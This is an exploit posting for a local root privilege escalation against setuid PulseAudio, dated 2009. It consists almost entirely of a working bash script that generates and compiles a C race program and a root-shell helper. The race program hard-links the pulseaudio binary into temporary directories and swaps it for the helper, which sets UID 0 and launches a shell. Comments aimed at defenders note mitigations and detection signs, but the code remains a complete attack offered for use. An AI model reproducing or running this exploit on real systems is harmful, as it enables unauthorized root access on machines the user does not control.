
Pulse Audio setuid Privilege Escalation

Pulse Audio setuid Privilege Escalation
Posted Jul 20, 2009

Pulse Audio setuid local privilege escalation exploit.

tags | exploit, local
SHA-256 | f0999000ab3ea0a79806e55c0a5c67d933478e0f8285df18faae4f664ed09b5a

Pulse Audio setuid Privilege Escalation

#!/bin/bash

# Scratch directory for the generated sources, binaries and PATMP* directories.
# The hard links made by pa_race.c only succeed when this directory is on the
# same filesystem as the pulseaudio binary (see the comment in pa_race.c), so
# keeping world-writable directories on a separate filesystem from setuid
# binaries stops the script at its first link() call.
workdir="/tmp"
#workdir=$HOME

# Absolute paths of the programs whose names are substituted into the
# generated C sources below.
pulseaudio=$(which pulseaudio)
id=$(which id)
shell=$(which sh)

# Remove everything this script created if it is interrupted with Ctrl-C.
trap cleanup INT

cleanup()
{
    # Delete the generated sources and binaries one by one, then any PATMP*
    # scratch directories left behind in workdir. These file names are also
    # what an investigator would look for after the script has been run.
    local leftover
    for leftover in sh sh.c pa_race pa_race.c
    do
        rm -f $workdir/$leftover
    done
    rm -rf $workdir/PATMP*
}

cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>

/*
 * The three paths below are filled in by the enclosing shell script when it
 * writes this file: the here-document is unquoted, so the shell variables are
 * expanded before the C compiler ever sees the text.
 */
/* Path of the installed pulseaudio binary, as resolved by the script. */
#define PULSEAUDIO_PATH "$pulseaudio"
/* Path of the helper program built from sh.c by the same script. */
#define SH_PATH "$workdir/sh"
/* mkdtemp() template; the trailing XXXXXX is replaced with a unique suffix. */
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"

/* Sleep helper defined at the end of this file. */
void _pause(long sec, long usec);

/*
 * Race loop against the pulseaudio binary named by PULSEAUDIO_PATH.
 *
 * Each iteration creates a fresh temporary directory, hard-links the
 * pulseaudio binary into it under the name "A", starts that link in a child
 * process, and then, after a short random delay, replaces "A" with a hard
 * link to the helper at SH_PATH. A second link to the helper is kept under
 * the name "A (deleted)". The loop only ends through one of the error
 * returns or when the process is killed.
 *
 * Review notes for defenders:
 *  - The first link() needs the unprivileged caller to be able to hard-link a
 *    binary it does not own. Kernels that enforce fs.protected_hardlinks
 *    refuse that, and the call also fails when the temporary directory is on
 *    another filesystem (see the comment at that call).
 *  - "A (deleted)" matches the string Linux reports as the /proc/PID/exe
 *    target once the running executable's name has been unlinked.
 *    NOTE(review): presumably the target re-executes itself through that
 *    path while still privileged; the target's code is not shown on this page.
 *  - Rapid creation and removal of PATMP* directories holding links named
 *    "A" and "A (deleted)" is the visible footprint of this loop.
 *
 * Returns 1 after printing a perror() message when any system call fails.
 */
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
/* Buffers are sized from the template: +2 for "/A", +12 for "/A (deleted)". */
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];

/* Seed rand(), which picks the delay before the link is swapped. */
srand(time(NULL));

for( ; ; )
{
/* mkdtemp() rewrites its argument, so restore the template every round. */
snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
template[sizeof(template) - 1] = '\0';

tmpdir = mkdtemp(template);
if(tmpdir == NULL)
{
perror("mkdtemp");
return 1;
}

/* Name under which the pulseaudio binary is linked and executed. */
snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
hardlink[sizeof(hardlink) - 1] = '\0';

/* Second name, used for a link to the helper binary. */
snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
hardlink2[sizeof(hardlink2) - 1] = '\0';

/* this fails if $workdir is a different partition */
if(link(PULSEAUDIO_PATH, hardlink) == -1)
{
perror("link");
return 1;
}

if(link(SH_PATH, hardlink2) == -1)
{
perror("link");
return 1;
}

pid = fork();

if(pid == 0)
{
/* Child: these locals shadow main's parameters; the environment is empty. */
char *argv[] = {hardlink, NULL};
char *envp[] = {NULL};

/* Run the pulseaudio binary through the hard link created above. */
execve(hardlink, argv, envp);

/* Only reached when execve() failed. */
perror("execve");
return 1;
}

if(pid == -1)
{
perror("fork");
return 1;
}
else
{
/* tweak this if exploit does not work */
/* Parent: wait between 0 and 499 microseconds before touching the link. */
_pause(0, rand() % 500);

/* Remove the name the child was started from ... */
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}

/* ... and point the same name at the helper binary instead. */
if(link(SH_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
/* Block until the child exits; the exit status is not inspected. */
waitpid(pid, &status, 0);
}

/* Tear down this round's links and directory before the next attempt. */
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}

if(unlink(hardlink2) == -1)
{
perror("unlink");
return 1;
}

if(rmdir(tmpdir) == -1)
{
perror("rmdir");
return 1;
}
}

/* Not reached: the loop above has no break. */
return 0;
}

/*
 * Sleep for sec seconds plus usec microseconds.
 *
 * Uses select() with no descriptor sets, so the call only waits for the
 * timeout. A failure is reported with perror() and otherwise ignored; the
 * function returns nothing to the caller.
 */
void _pause(long sec, long usec)
{
struct timeval timeout;

timeout.tv_sec = sec;
timeout.tv_usec = usec;

/* No descriptors are watched, so this call is used purely as a timer. */
if(select(0, NULL, NULL, NULL, &timeout) == -1)
{
perror("select");
}
}
__EOF__

cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


/*
 * Helper program that the race loop links into its temporary directories.
 *
 * It does nothing unless its effective UID is already 0. In that case it
 * sets the real UID and GID to 0, runs the id program in a child process and
 * replaces itself with the shell. Both program paths are substituted by the
 * generating script when it writes this file.
 *
 * Review note for defenders: a process with effective UID 0 whose executable
 * lives in a world-writable temporary directory, and which then spawns id and
 * a shell, is a strong signal for process-execution monitoring.
 *
 * Returns 1 when not running with effective UID 0 or when an execve() fails.
 */
int main(int argc, char *argv[], char *envp[])
{
/* Exit quietly on every attempt where no elevated privilege was obtained. */
if(geteuid() != 0)
{
return 1;
}

/* Return values are not checked. */
setuid(0);
setgid(0);

if(fork() == 0)
{
/* Child: run id with the inherited environment; argv is reused in place. */
argv[0] = "$id";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}

/* Parent: replace this process with the shell. */
argv[0] = "$shell";
argv[1] = NULL;
execve(argv[0], argv, envp);
/* Only reached when execve() failed. */
return 1;
}
__EOF__

# Compile the two generated sources into workdir. The exit status of gcc is
# not checked, so a failed build is only noticed when the next command fails.
# A compiler run by an unprivileged account that writes executables into a
# world-writable directory is itself worth alerting on, and a noexec mount
# of that directory prevents the final command from starting.
gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c

# Start the race loop; it runs until it hits an error or is interrupted,
# at which point the INT trap set earlier calls cleanup.
$workdir/pa_race

